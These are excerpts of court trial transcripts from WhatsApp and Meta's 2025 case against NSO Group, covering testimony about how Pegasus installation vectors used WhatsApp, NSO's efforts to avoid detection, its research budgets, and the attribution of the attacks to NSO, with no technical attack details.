Q.   WOULD YOU, AS SOMEONE WHO'S STUDYING WHATSAPP WITH THE BLACK BOX THAT YOU TALKED ABOUT, KNOW IMMEDIATELY THAT THERE WAS A CHANGE?

A.   NO.

Q.   OR WHY THERE WAS A CHANGE?

A.   NO.

Q.   DO YOU -- I DIRECT YOUR ATTENTION TO DECEMBER 2018 AND THE END OF THE HEAVEN VECTOR.

DO YOU REMEMBER THAT DATE?

A.   YES.

Q.   AM I CORRECT THAT THAT WAS THE END OF THE HEAVEN VECTOR?

A.   YES.

Q.   CAN YOU EXPLAIN WHAT TYPE OF CHANGE OCCURRED THAT CAUSED
NSO THEN TO CLOSE THE HEAVEN VECTOR?

A.   WE STARTED TO GET AN ERROR MESSAGE DURING THE INSTALLATION
FLOW, AN ERROR MESSAGE 403.

Q.   AND WHEN YOU SAY THAT YOU STARTED RECEIVING AN ERROR
MESSAGE 403, WHAT DOES THAT LOOK LIKE WHEN YOU SEE THE MESSAGE?

A.   IT'S A STANDARD ERROR IN THE COMMUNICATION.  IT JUST
STATES SERVER UNREACHABLE.

Q.   AND AN ERROR 403?

A.   YES.

Q.   SORT OF LIKE ERROR 404?

A.   YES.

Q.   WHAT IS ERROR 404, IF YOU KNOW?

A.   I CAN'T REMEMBER, I CANNOT REMEMBER THE TEXT OF IT.  BUT,
YEAH, IT'S LIKE --

Q.   THAT'S OKAY.

A.   YEAH.

Q.   COMMON 404 ERROR MESSAGE?

A.   YEAH.

Q.   AND WHAT DID YOU DO AFTER HAVING RECEIVED THE 403 ERROR
MESSAGE, ERROR MESSAGES THAT WE'RE TALKING ABOUT IN DECEMBER

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 70 of 157
Case 4:19-cv-07123-PJH   Document 753   Filed 06/05/25   Page 97 of 329
GAZNELI CROSS BY MR. PEREZ

944

TRANSCRIPT, PAGE 333 --

MAY I PUBLISH TO THE JURY, YOUR HONOR?

THE COURT:  YES.

MR. PEREZ:  IT'S JUST THE SIGNATURE PAGE.

THE CLERK:  THERE'S JUST A DELAY.

MR. PEREZ:  OH, GREAT.

IF WE COULD ZOOM IN ON THE CERTIFICATE OF WITNESS THERE, THAT BOTTOM PORTION.

Q.   YOU SIGNED THE CERTIFICATION REFLECTING THAT THE TRANSCRIPT WAS ACCURATE; CORRECT?

A.   YES.

Q.   THAT'S YOUR SIGNATURE THAT WE SEE THERE?

A.   YEAH.

Q.   AFFIRMING THAT THE TRANSCRIPT WAS CORRECT; RIGHT?

A.   YES.

Q.   SO IN YOUR TESTIMONY JUST NOW, YOU DON'T MEAN TO CONTRADICT ANYTHING THAT YOU SAID IN YOUR DEPOSITION TESTIMONY; CORRECT?

A.   NO.

Q.   AND THE JURY CAN RELY ON EVERY WORD OF YOUR DEPOSITION TESTIMONY; IS THAT RIGHT?

A.   YEAH.

Q.   THANK YOU.

NOW, YOU WERE ASKED ABOUT YOUR CURRENT RESPONSIBILITIES AS VICE PRESIDENT OF R&D AND THE EMPLOYEES THAT YOU SUPERVISE.

DO YOU RECALL THOSE QUESTIONS?

A.   YES.

Q.   THERE ARE OVER 100 SUCH EMPLOYEES, AREN'T THERE?

A.   YES.

Q.   HOW MANY PEOPLE ARE IN THE R&D GROUP AT NSO?

A.   ABOUT 140.

Q.   140 PEOPLE?

A.   YES.

Q.   CURRENTLY DEVOTED TO RESEARCH AND DEVELOPMENT AT NSO?

A.   YES.

Q.   AND THAT WORK IS SUPPORTED BY THE $50 MILLION BUDGETS THAT ARE REFLECTED IN NSO'S FINANCIAL STATEMENTS; ISN'T THAT RIGHT?

A.   YES.

Q.   NOW, YOU WERE ASKED SOME QUESTIONS BY YOUR COUNSEL AS TO WHETHER THE 50 MILLION, AND ALMOST $60 MILLION BUDGETS FOR R&D THAT WE SAW IN THE 2024 FINANCIAL STATEMENTS, WHETHER ANY OF THAT BUDGET FOR LAST YEAR WENT TOWARDS DEVELOPING THE VECTORS THAT ARE AT ISSUE IN THIS CASE.

DO YOU RECALL THOSE QUESTIONS?

A.   YES.

Q.   ALL RIGHT.  AND THE ANSWER WAS NO, THE MONEY WE SPENT IN 2024 DIDN'T PAY FOR WORK IN 2017 OR '18; RIGHT?

A.   YEAH.

Q.   BUT IN 2018 AND 2019, THERE WAS AN R&D BUDGET, WASN'T THERE?

THE FIRST HUMMINGBIRD VECTOR, HEAVEN, WAS IN PRODUCTION,

MEANING DELIVERED TO CUSTOMERS FOR USE; RIGHT?

A.   YES.

Q.   SO THE ENTIRE PROCESS OF DEVELOPING THE FIRST OF THE

HUMMINGBIRD VECTORS, WE'RE TALKING ABOUT A YEAR, AT LEAST, OF

RESEARCH AND DEVELOPMENT TO DEVELOP THIS THING; IS THAT RIGHT?

A.   YES.

Q.   WITH FOUR ENGINEERS WORKING FULL TIME; CORRECT?

A.   YEAH.

Q.   NOW, THAT RESEARCH AND DEVELOPMENT WORK INCLUDED WORKING

TO UNDERSTAND THE, WHAT WE CALL THE CLIENT APPLICATION; RIGHT?

THE APP THAT'S ACTUALLY ON SOMEONE'S PHONE; CORRECT?

A.   YES.

Q.   AND IN ORDER TO UNDERSTAND THE CLIENT APPLICATION, YOU

DECOMPILE AND HAD REVERSE ENGINEERED THE CODE; CORRECT?

A.   WE DECOMPILED THE CODE, YEAH.

Q.   AND I THINK YOU TESTIFIED AT YOUR DEPOSITION THAT YOU

REVERSE ENGINEERED IT; RIGHT?

A.   I TESTIFIED THAT REVERSE ENGINEERING IS A LEGAL TERM, AND

WE SAID THAT WE WERE DECOMPILING THE CODE.

Q.   RIGHT.  AND I THINK YOU AGREED AT YOUR DEPOSITION THAT THE

WORK YOU WERE DOING FITS THE DEFINITION OF REVERSE ENGINEERING.

YOU'RE NOT CHANGING THAT TESTIMONY, ARE YOU?

A.   I'M NOT CHANGING ANYTHING.

Q.   I DIDN'T THINK SO.

A.   YEAH.

Q.   YOU'RE FAMILIAR WITH THE ERISED VECTOR; RIGHT?

A.   YES.

Q.   IT WAS DEVELOPED DURING YOUR TIME IN THE R&D GROUP AT NSO?

A.   YES.

Q.   AND I BELIEVE YOU TESTIFIED THAT -- CAN YOU REMIND ME WHEN YOU BECAME VICE PRESIDENT OF RESEARCH AND DEVELOPMENT?

A.   IT WAS BEGINNING OF 20 -- VICE PRESIDENT OF RESEARCH AND DEVELOPMENT?

Q.   YES.

A.   END OF 2022.

Q.   END OF 2022.  SO AT THE BEGINNING OF 2020, YOU WERE DIRECTOR OF R&D?

A.   NOT THE BEGINNING.  THE MIDDLE.

Q.   NOW, ERISED -- AND YOU TESTIFIED ABOUT THIS AT YOUR DEPOSITION -- WAS DEVELOPED AFTER WHATSAPP REMEDIATED THE 2019 ATTACKS; IS THAT RIGHT?

A.   YEAH.

Q.   RIGHT.  SO IN MAY 2019, THIS JURY HAS HEARD A LOT ABOUT THIS, WHATSAPP FIXED THE MECHANISM BY WHICH EDEN, THE SECOND OF THE THREE INSTALLATION, HUMMINGBIRD VECTORS, WAS INSTALLING PEGASUS ON USER'S PHONES; CORRECT?

A.   YES.

Q.   AND AFTER WHATSAPP PREVENTED EDEN FROM WORKING, NSO'S R&D GROUP DEVELOPED ANOTHER VECTOR TO CONTINUE USING WHATSAPP TO

INSTALL PEGASUS ON USERS' DEVICES; ISN'T THAT RIGHT?

A.   THIS WAS A DIFFERENT VECTOR, IT USED DIFFERENT SERVERS AND TYPE OF SERVERS.

Q.   CAN WE AGREE THAT IT TRIGGERED THE INSTALLATION OF WHATSAPP -- OF PEGASUS, AT LEAST IN PART, THROUGH THE SENDING OF WHATSAPP MESSAGES?

A.   YES.

Q.   YES.  AND THAT WAS AFTER WHATSAPP HAD CLOSED THE VULNERABILITIES, IF THAT'S THE WORD YOU'D LIKE TO USE, THAT ALLOWED THE EDEN VECTOR ALSO TO USE WHATSAPP MESSAGES TO INSTALL PEGASUS; IS THAT WHAT YOU SAID?

A.   YES.

Q.   AND ERISED WAS IN USE IN 2020; ISN'T THAT CORRECT?

A.   YES.

Q.   ALL THE WAY UP THROUGH AT LEAST MAY OF 2020; ISN'T THAT CORRECT?

A.   YES.

Q.   AND THE PURPOSE OF ERISED SENDING MESSAGES THROUGH WHATSAPP SERVERS WAS TO TRIGGER INSTALLATION OF PEGASUS ON TARGET DEVICES; RIGHT?

A.   YES.

Q.   IN ORDER TO OBTAIN ACCESS TO THOSE USERS AS INFORMATION; RIGHT?

A.   YES.

Q.   NOW, YOU TESTIFIED UNDER EXAMINATION BY YOUR LAWYERS ABOUT

SOME OF THE INFRASTRUCTURE THAT THE CUSTOMERS HAVE.

DO YOU RECALL THOSE QUESTIONS?

A.   YES.

Q.   AND THAT INCLUDES COMPUTERS, SERVERS?  IS THAT GENERALLY WHAT IT INCLUDES, THE INFRASTRUCTURE?

A.   YES.

Q.   AND THAT INFRASTRUCTURE WOULD BE PURCHASED BY, OR LEASED, BY NSO; ISN'T THAT RIGHT?

A.   NOT ALL OF IT.

Q.   SOME OF THEM AT LEAST; RIGHT?

A.   YEAH.

Q.   AND THE GROUP AT NSO THAT WAS RESPONSIBLE FOR THE ACQUIRING OF THIS INFRASTRUCTURE WAS CALLED THE WHITE SERVICES GROUP; ISN'T THAT RIGHT?

A.   YES.

Q.   AND THE PURPOSE OF THE WHITE SERVICES GROUP WAS NOT JUST TO ACQUIRE THIS INFRASTRUCTURE, BUT TO DO IT IN A WAY THAT WAS ANONYMIZED; ISN'T THAT CORRECT?

A.   THIS IS REQUIREMENT OF THE CUSTOMERS, YES.

Q.   I THINK YOU USED THOSE EXACT WORDS IN YOUR DEPOSITION. IT'S A REQUIREMENT THAT THE ACQUISITION OF THE INFRASTRUCTURE BE ANONYMIZED; RIGHT?

A.   YES.

Q.   SO THAT IT COULDN'T BE TRACED BACK TO THE CUSTOMER; CORRECT?

A.    YES.

Q.    AND COULDN'T BE TRACED BACK TO NSO; RIGHT?

A.    YES.

Q.    THAT WAS ONE OF THE WAYS, NOT THE ONLY WAY, BUT ONE OF THE WAYS THAT NSO COVERED ITS TRACKS HERE; ISN'T THAT RIGHT?

A.    I'M NOT -- I WON'T COVER TRACKS.  IT'S CUSTOMER'S REQUIREMENT.  THIS IS TO BE, AS I SAID, TO BE UNDETECTABLE IN TERMS OF TARGET, TARGET DEVICES.

Q.    RIGHT, IT WAS UNDETECTABLE BY DESIGN; RIGHT?

A.    YES.

Q.    AND NSO, THROUGH ITS WHITE SERVICES GROUP, WAS THE ONE WHO TOOK RESPONSIBILITY FOR ACHIEVING THAT RESULT OF MAKING IT UNTRACEABLE AND UNDETECTABLE; ISN'T THAT RIGHT?

A.    NSO, AS I SAID, THE SERVERS AND THE ECOSYSTEM OF THE INFRASTRUCTURE SITS ON CUSTOMER'S PREMISES.  IT'S OWNED BY THEM.

Q.    IT'S ACQUIRED BY NSO ANONYMOUSLY; RIGHT?

A.    SOME OF THEM.

Q.    YOU WERE ASKED SOME QUESTIONS BY YOUR COUNSEL ABOUT THE HANDSHAKE PROCESS.

DO YOU RECALL THAT?

A.    YES.

Q.    AND THAT REFERS TO THE INFORMATION THAT GETS EXCHANGED BETWEEN TWO DEVICES TO ESTABLISH A CONNECTION BETWEEN THEM; IS THAT GENERALLY CORRECT?

PEGASUS WAS OBTAINING INFORMATION FROM THE TARGET DEVICES

THROUGH WHATSAPP SERVERS; CORRECT?

A.   YES.

Q.   YES?

A.   YES.

Q.   AND IT WAS DESIGNED TO GET THAT INFORMATION THROUGH

WHATSAPP SERVERS; RIGHT?

A.   THIS INFORMATION WAS NOT FROM THE WHATSAPP SERVERS.  IN

FACT, IT WAS -- IT WAS DEFINED ACCORDING TO THE RESPONSE FROM

THE TARGET DEVICE.

Q.   IT CAME THROUGH WHATSAPP SERVERS; CORRECT?

A.   YES.

Q.   AND IT WAS DESIGNED TO DO SO; CORRECT?

A.   YES.

Q.   I'D LIKE TO ASK YOU SOME QUESTIONS -- YOU WERE ASKED A

NUMBER OF QUESTIONS ABOUT WHETHER YOU INTENDED TO HARM

WHATSAPP.

DO YOU RECALL THAT?  IT WENT ON FOR SOME TIME.  DO YOU

REMEMBER THAT QUESTIONING?

A.   YES.

Q.   NOW, I WANT TO ASK YOU A LITTLE DIFFERENT PERSPECTIVE ON

THAT QUESTION, MR. GAZNELI.

ISN'T IT CORRECT THAT WHEN YOUR R&D GROUP DESIGNS A

STRATEGY TO INSTALL PEGASUS, YOUR GROUP WANTS TO KEEP IT UP AND

RUNNING FOR AS LONG AS POSSIBLE?

A.   YES.

Q.   ALL RIGHT.  AND THAT REQUIRES MINIMIZING THE RISK OF DETECTION; ISN'T THAT CORRECT?

A.   THIS IS ONLY ONE PART OF IT.  I EXPLAINED THE OTHER PART RELATES ALSO FOR THE DISCOVERY TOWARDS THE TARGETS THEMSELVES.

Q.   LET'S JUST MAKE SURE WE'RE CLEAR ON THIS, MR. GAZNELI.

WE AGREE THAT R&D HAS THE GOAL OF KEEPING ITS INSTALLATION VECTORS UP AND RUNNING FOR AS LONG AS POSSIBLE; RIGHT?

A.   YES.

Q.   AND PART OF KEEPING THEM UP AND RUNNING AS LONG AS POSSIBLE IS MINIMIZING THE RISK OF THEIR DETECTION; ISN'T THAT CORRECT?

A.   AS I SAID, THIS IS ONE PART OF IT.

IN ADDITION, IT WAS -- THE GOAL IS TO MINIMIZE THE FOOTPRINT ON THE ECOSYSTEM.

Q.   RIGHT.  RIGHT.  I WANT TO STEP LIGHTLY, NOT LEAVE FOOTPRINTS.  THAT'S WHAT YOU'RE SAYING?

A.   YES.

Q.   OKAY.  BECAUSE IN ORDER TO KEEP THE VECTORS UP AND RUNNING AS LONG AS POSSIBLE, YOU DON'T WANT PEOPLE TO TELL YOU'VE BEEN THERE; CORRECT?

A.   I CANNOT TELL WHETHER OR NOT I'VE BEEN THERE.  BUT IN TERMS OF I USE THE SYSTEM ACCORDING TO THE RULES THAT'S SET, AND TO LOOK AS NORMAL AS POSSIBLE.

Q.   RIGHT.  IN ORDER TO MINIMIZE THE RISK OF DETECTION; ISN'T

THAT CORRECT?

A.   YES.

Q.   BECAUSE -- AND, INDEED, THAT'S THE ROLE OF THE OPSEC GROUP, OR AT LEAST PART OF THE ROLE OF THE OPSEC GROUP; CORRECT?

A.   PART OF THE ROLE, YES.

Q.   RIGHT, TO MINIMIZE THE RISK OF DETECTION SO THAT THE INSTALLATION VECTORS CAN BE KEPT GOING AS LONG AS POSSIBLE; CORRECT?

A.   YES.

Q.   SO THAT THEY CAN BE USED AS MANY TIMES AS POSSIBLE; ISN'T THAT RIGHT?

A.   AS FAR AS THE CUSTOMERS WOULD LIKE AND HAVE THE RIGHT TO DO IT, YEAH.

Q.   OKAY.  AND THAT'S -- THE REASON YOU'RE MINIMIZING THE RISK OF DETECTION DELIBERATELY IS THAT NSO UNDERSTANDS THAT THERE ARE ACTORS OUT THERE, SUCH AS WHATSAPP, THAT WOULD TAKE STEPS TO BLOCK THE INSTALLATION IF THEY DETECTED IT; ISN'T THAT RIGHT?

A.   YES.

Q.   AND THAT'S WHY -- YOU RECALL THE HEAVEN OPSEC DOCUMENT THAT I SHOWED YOU AT YOUR DEPOSITION?

A.   YES.

Q.   WHY DON'T WE PUT IT UP ON THE SCREEN.  IT'S PTX-60.

     AND MR. EVANS, IF WE CAN GO TO PAGE 2.

YOU WERE ASKED ALL THESE QUESTIONS BY YOUR COUNSEL ABOUT WHETHER YOU INTENDED TO HARM WHATSAPP.

NOW, THE WAY YOU REFERRED TO WHATSAPP IN THE CONTEXT OF OPSEC, IN THE CONTEXT OF DELIBERATELY HIDING WHAT YOU WERE DOING FROM WHATSAPP, WAS YOU CALLED THEM A THREAT ACTOR; ISN'T THAT RIGHT?

A.   YEAH, IT'S NOT A DOCUMENT I WROTE.  WE TALKED ABOUT THAT AT THE DEPOSITION.

Q.   RIGHT.  THIS IS A DOCUMENT FROM THE OPSEC TEAM?

A.   YES.

Q.   AND WHATSAPP WAS VIEWED NOT A FRIEND, NOT A COLLEAGUE, CHARACTERIZED AS A THREAT ACTOR; RIGHT?

A.   THIS IS A TERM USED BY OPSEC TOWARDS ANY SERVICE THAT WOULD DISTURB THIS.

Q.   RIGHT.  AND NSO VIEWED WHATSAPP AS A THREAT BECAUSE THEY WERE A THREAT TO NSO'S CONTINUED -- ABILITY TO CONTINUE PROVIDING THE ABILITY TO INFECT ADDITIONAL DEVICES; ISN'T THAT RIGHT?

A.   OKAY.

Q.   I'M SORRY?

A.   YEAH.

Q.   BECAUSE YOU UNDERSTOOD THAT WHATSAPP WOULD BLOCK THE EXPLOIT IF THEY DETECTED IT; RIGHT?

A.   IF YOU DAMAGE THE SERVICE AND THE SERVERS, WHICH WE DIDN'T DO PURPOSEFULLY IN ORDER TO ACT AS NORMAL AS POSSIBLE, THEN, OF

COURSE, THE PROVIDER WOULD BLOCK THE MESSAGES, YES.

Q.   ACT AS NORMAL AS POSSIBLE SO NO ONE WOULD KNOW WHAT YOU WERE DOING; RIGHT?

A.   AS WE SAW BEFORE, THE CODE WAS SENT PLAIN CORRECT TEXT. SO IF SOMEONE WOULD LIKE TO VIEW THAT CODE, THEY HAVE THE ABILITY.

Q.   YOU'RE NOT CHANGING YOUR TESTIMONY, MR. GAZNELI, THAT NSO DELIBERATELY MINIMIZED THE RISK OF DETECTION; CORRECT?

A.   NO, I'M NOT CHANGING ANYTHING.

Q.   RIGHT.  YOU HAD A TEAM OF PEOPLE WHO WAS DEVOTED TO PREVENTING DETECTION OF THIS; CORRECT?

A.   YES.

Q.   OKAY.  AND THE REASON -- YOU UNDERSTOOD THAT THE REASON THAT WHATSAPP WOULD BLOCK THIS ACTIVITY IF THEY DETECTED IT WAS THAT NSO KNEW THAT WHATSAPP DID NOT WANT THIS ACTIVITY ON THEIR SERVERS; RIGHT?

A.   I DON'T KNOW WHETHER WHATSAPP KNEW IT OR NOT.

Q.   WELL, YOU CERTAINLY UNDERSTOOD IF THEY DETECTED IT, THEY WOULD BLOCK IT; RIGHT?

A.   THIS IS A STANDARD PROCEDURE IN ANY VECTOR, TO MINIMIZE THE FOOTPRINT AS I SAID BEFORE, YEAH.

Q.   AND DESPITE KNOWING THAT WHATSAPP WOULD STOP THIS ACTIVITY IF THEY DETECTED IT, DESPITE KNOWING THAT WHATSAPP DIDN'T WANT THIS ON THEIR SERVERS, NSO DID IT ANYWAY; ISN'T THAT RIGHT?

A.   AS I SAID, I DON'T KNOW WHAT WHATSAPP WANTED OR NOT.  HOW

WOULD I KNOW?

Q.   AND NSO DID THAT REPEATEDLY; ISN'T THAT CORRECT?

A.   AS I SAID BEFORE, WHEN THE RULES CHANGED, THE PRODUCT WAS ADJUSTED AND ACT ACCORDING TO THE NEW RULES.

Q.   WELL, IT WAS REPEATED IN A COUPLE DIFFERENT SENSES; RIGHT?

LET ME BREAK IT DOWN FOR YOU.

THE HEAVEN INSTALLATION VECTOR, WHICH USED WHATSAPP TO TRIGGER THE INSTALLATION OF PEGASUS ON USERS' DEVICES, THAT WASN'T USED JUST ONCE, WAS IT?

A.   HEAVEN.

Q.   THE HEAVEN INSTALLATION VECTOR WAS NOT USED ONLY ONE TIME, WAS IT, MR. GAZNELI?

A.   BY THE CUSTOMERS?

Q.   BY WHOEVER WAS USING IT?

A.   BY CUSTOMERS, AS I SAID, AS LONG AS IT WAS ACTIVE, IT WAS USED.

Q.   IT WAS USED MANY TIMES; ISN'T THAT RIGHT?

A.   AS FAR AS THEY HAD THE RIGHT TO USE IT, YEAH.

Q.   I'M SORRY?

A.   AS FAR AS THE FOUND RIGHT, THEY NEEDED TO BE USED.

Q.   SO IT WAS USED AS MANY TIMES AS THE CUSTOMERS WANTED; RIGHT?

A.   NO.  THE CUSTOMERS HAD THE LIMITED ABILITY -- THE LIMITED AMOUNT OF USE TO THEM TO DO.

Q.   RIGHT.  AND IF THEY WANT MORE USES, NSO CHARGES THEM MORE;

CERTIFICATE OF REPORTERS

WE, THE UNDERSIGNED OFFICIAL COURT REPORTERS OF THE

UNITED STATES DISTRICT COURT FOR THE NORTHERN DISTRICT OF

CALIFORNIA, 280 SOUTH FIRST STREET, SAN JOSE, CALIFORNIA, DO

HEREBY CERTIFY:

THAT THE FOREGOING TRANSCRIPT, CERTIFICATE INCLUSIVE, IS

A CORRECT TRANSCRIPT FROM THE RECORD OF PROCEEDINGS IN THE

ABOVE-ENTITLED MATTER.

_____
IRENE RODRIGUEZ, CSR, CRR
CERTIFICATE NUMBER 8076

_____
LEE-ANNE SHORTRIDGE, CSR, CRR
CERTIFICATE NUMBER 9595

DATED:  MAY 2, 2025

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 84 of 157
Case 4:19-cv-07123-PJH    Document 751    Filed 06/05/25    Page 1 of 213

636

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

| | | |
|---|---|---|
| WHATSAPP LLC AND META PLATFORMS, INC., | ) | C-19-07123 PJH |
| | ) | |
| | ) | OAKLAND, CALIFORNIA |
| PLAINTIFFS, | ) | |
| | ) | MAY 1, 2025 |
| VS. | ) | |
| | ) | VOLUME 4 |
| NSO GROUP TECHNOLOGIES LIMITED | ) | |
| AND Q CYBER TECHNOLOGIES | ) | PAGES 636-847 |
| LIMITED, | ) | |
| | ) | |
| DEFENDANTS. | ) | |
| | ) | |

TRANSCRIPT OF PROCEEDINGS
BEFORE THE HONORABLE PHYLLIS J. HAMILTON
UNITED STATES DISTRICT JUDGE


A P P E A R A N C E S:

FOR THE PLAINTIFFS:      DAVIS POLK & WARDWELL
                         BY:  GREG D. ANDRES
                              ANTONIO J. PEREZ
                         450 LEXINGTON AVENUE
                         NEW YORK, NEW YORK  10017

                         BY:  MICAH G. BLOCK
                         900 MIDDLEFIELD ROAD, SUITE 200
                         REDWOOD CITY, CALIFORNIA  94063

OFFICIAL COURT REPORTERS:   LEE-ANNE SHORTRIDGE, CSR, CRR
                            CERTIFICATE NUMBER 9595
                            IRENE RODRIGUEZ, CSR, RMR, CRR
                            CERTIFICATE NUMBER 8074

PROCEEDINGS RECORDED BY MECHANICAL STENOGRAPHY
TRANSCRIPT PRODUCED WITH COMPUTER

THOUGH, SO THAT --

MR. ANDRES:  OKAY.  I'LL TRY.

THE COURT:  OKAY.

MR. ANDRES:  I HAVEN'T HAD A PROBLEM FOR ME.

Q.   RESEARCH AND DEVELOPMENT, MR. SHOHAT, DO YOU SEE THAT RIGHT HERE (INDICATING)?

A.   I DO.

Q.   AND THESE NUMBERS ARE IN MILLIONS?

A.   CORRECT.

Q.   THAT IS $52 MILLION SPENT ON R&D IN 2023?

A.   SO YOU ASKED ME IF THAT'S THE EXPENSE ON R&D.  THE ANSWER IS NO BECAUSE THAT LINE INCLUDES OTHER DEPARTMENTS THAT I'LL EXPLAIN, OTHER DEPARTMENTS THAT ARE NOT PEOPLE OR ACCOUNTANTS LIKE TO PUT IT TOGETHER.  TO GIVE AN EXAMPLE --

Q.   I'M SORRY, MR. SHOHAT.  I'M GOING TO ASK YOU TO ANSWER MY QUESTION.  MR. AKROTIRIANAKIS CAN ASK YOU ALL THE QUESTIONS HE WANTS.

IT SAYS RESEARCH AND DEVELOPMENT.

DO YOU SEE THAT?

A.   YES.

Q.   AND NSO SPENT $52 MILLION IN 2023 FOR RESEARCH AND DEVELOPMENT?  YES OR NO?

A.   NO.

Q.   OKAY.  HOW ABOUT IN 2024, THEY SPENT $59 MILLION IN RESEARCH AND DEVELOPMENT?

A.   NO.

Q.   OKAY.  SO THIS DOCUMENT IS INACCURATE BECAUSE IT SAYS RESEARCH AND DEVELOPMENT AND IT SAYS $52 AND $59 MILLION?

A.   I WOULD BE HAPPY TO EXPLAIN.

Q.   I'M ASKING IF THIS DOCUMENT IS INACCURATE.

A.   THIS DOCUMENT INCLUDES THE I.T. DEPARTMENT, FOR INSTANCE.
     BUT I WILL AGREE THAT R&D IS THE MAJORITY OF THIS NUMBER.

Q.   THE MAJORITY OF THE 52 MILLION?

A.   I AGREE.

Q.   AND THAT R&D IS WHAT'S USED TO DEVELOP PEGASUS, WHICH ALLOWS YOUR CLIENTS TO SPY ON PEOPLE'S PHONES?

A.   THIS R&D DEVELOPED PEGASUS, AMONG OTHER THINGS, AND PEGASUS ALLOWS GOVERNMENT AGENCIES TO GATHER INTELLIGENCE FROM THE TARGETS.

Q.   AND THAT MONEY, THE $50 MILLION FROM 2023 AND $59 MILLION IS THE MONEY THAT'S USED TO DEVELOP THAT?

A.   I THINK I ANSWERED.  I CAN EXPLAIN AGAIN.

Q.   I'M ASKING YOU, YES OR NO, THAT MORE THAN $100 MILLION IS USED FOR TECHNOLOGY DEVELOPMENT, LIKE PEGASUS?

A.   SO MY ANSWER WAS NO, AND I EXPLAINED WHY I DON'T VIEW IT EXACTLY AS DESCRIBED.

Q.   YOU SAID IT'S ALSO FOR I.T. AND THAT I.T. IS USED WITH RESPECT TO PEGASUS.

A.   I.T. IS ALSO WHAT'S MAKING, KEEPING MY EMAIL SERVER, AND ALLOWING ME TO SEND EMAILS AND OTHER STUFF.  THAT'S WHY IT'S

NOT JUST R&D IN THE SENSE OF DEVELOPING PRODUCT.

BUT I AGREE, IT'S THE MAJORITY -- THE MAJORITY OF THIS EXPENSE GOES TO RESEARCH AND DEVELOPMENT AS YOU WANT TO DEFINE IT.

Q.   AND IF NSO DIDN'T SPEND $50 MILLION, $52 MILLION ON R&D, IT MIGHT HAVE A LARGER OPERATING INCOME; RIGHT?  IF THEY DIDN'T SPEND $52 MILLION HERE, THIS NUMBER, WHICH YOU SAY IS LOSING MONEY, WOULD BE HIGHER?

A.   SO THAT IS NOT, BECAUSE IF WE WOULDN'T HAVE DEVELOPED PEGASUS, THE REVENUE LINE ON THE TOP WOULD SHIFT MUCH MORE, WE WOULD BE LOSING MUCH MORE MONEY.

Q.   IF YOU STOP SPYING ON PEOPLE, YOU MIGHT HAVE A PROFIT?

A.   I NEVER -- DON'T ACCUSE ME OF SPYING, I NEVER SPIED ON ANYONE.  AND MY COMPANY NEVER SPIED ON ANYONE.

Q.   THAT'S YOUR WORD.  YOU UNDERSTAND THAT?

A.   I SWORE TO SAY THE TRUTH, AND THIS IS MY TESTIMONY.  I NEVER SPIED ON ANYONE.  MY COMPANY NEVER SPIED ON ANYONE. PLEASE DON'T ACCUSE ME OF THAT.

Q.   THE PRODUCTS THAT YOU CREATED, THAT YOU SOLD TO YOUR CUSTOMERS, SPIED ON INDIVIDUALS?

A.   THE PRODUCT THAT I DEVELOPED AND LICENSED TO GOVERNMENTS ALLOWED THOSE GOVERNMENTS TO COLLECT INTELLIGENCE FROM TARGETS.

Q.   YOU CALL IT INTELLIGENCE, BUT AT THE END OF THE DAY, IT'S STILL PEOPLE'S TEXT MESSAGES; RIGHT?

A.   IT'S THE TEXT MESSAGES OF CERTAIN PEOPLE.

CERTIFICATE OF REPORTERS

WE, THE UNDERSIGNED OFFICIAL COURT REPORTERS OF THE

UNITED STATES DISTRICT COURT FOR THE NORTHERN DISTRICT OF

CALIFORNIA, 280 SOUTH FIRST STREET, SAN JOSE, CALIFORNIA, DO

HEREBY CERTIFY:

THAT THE FOREGOING TRANSCRIPT, CERTIFICATE INCLUSIVE, IS

A CORRECT TRANSCRIPT FROM THE RECORD OF PROCEEDINGS IN THE

ABOVE-ENTITLED MATTER.

_____
IRENE RODRIGUEZ, CSR, CRR
CERTIFICATE NUMBER 8076

_____
LEE-ANNE SHORTRIDGE, CSR, CRR
CERTIFICATE NUMBER 9595

DATED:  MAY 1, 2025

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

| | | |
|---|---|---|
| WHATSAPP LLC AND META PLATFORMS, INC., | ) | C-19-07123 PJH |
| | ) | OAKLAND, CALIFORNIA |
| PLAINTIFFS, | ) | |
| | ) | APRIL 30, 2025 |
| VS. | ) | |
| | ) | VOLUME 3 |
| NSO GROUP TECHNOLOGIES LIMITED AND Q CYBER TECHNOLOGIES LIMITED, | ) | PAGES 517-635 |
| | ) | |
| DEFENDANTS. | ) | |
| | ) | |

TRANSCRIPT OF PROCEEDINGS
BEFORE THE HONORABLE PHYLLIS J. HAMILTON
UNITED STATES DISTRICT JUDGE

A P P E A R A N C E S:

FOR THE PLAINTIFFS:     DAVIS POLK & WARDWELL
                        BY:  GREG D. ANDRES
                             ANTONIO J. PEREZ
                        450 LEXINGTON AVENUE
                        NEW YORK, NEW YORK  10017

                        BY:  MICAH G. BLOCK
                        900 MIDDLEFIELD ROAD, SUITE 200
                        REDWOOD CITY, CALIFORNIA  94063

OFFICIAL COURT REPORTERS:    LEE-ANNE SHORTRIDGE, CSR, CRR
                             CERTIFICATE NUMBER 9595
                             IRENE RODRIGUEZ, CSR, RMR, CRR
                             CERTIFICATE NUMBER 8074

PROCEEDINGS RECORDED BY MECHANICAL STENOGRAPHY
TRANSCRIPT PRODUCED WITH COMPUTER

THESE IN BULK SO THAT I COULD PULL OUT ALL OF THE SERVERS THAT WERE USED BY THESE, BY THESE PAYLOADS.

Q.   DO YOU USE THE WORD "ATTRIBUTION" IN YOUR SECURITY INCIDENT RESPONSE WORK?

A.   I DO.

Q.   WHAT IS ATTRIBUTION IN THIS CONTEXT?

A.   SO ATTRIBUTION IS TRYING TO DETERMINE THE PERPETRATOR BEHIND AN ATTACK.

Q.   DID YOU DO AN ATTRIBUTION ANALYSIS IN THIS CASE?

A.   I DID.

Q.   WOULD YOU PLEASE EXPLAIN THAT ANALYSIS TO THE JURY.

A.   SO WE TOOK ALL OF THE I.P. ADDRESSES THAT WE PULLED OUT OF THESE ELF FILES AND DETERMINED THAT THEY HAD LINKED BACK TO NSO GROUP DUE TO AN OPERATIONAL SECURITY FAILURE THAT THEY HAD MADE.

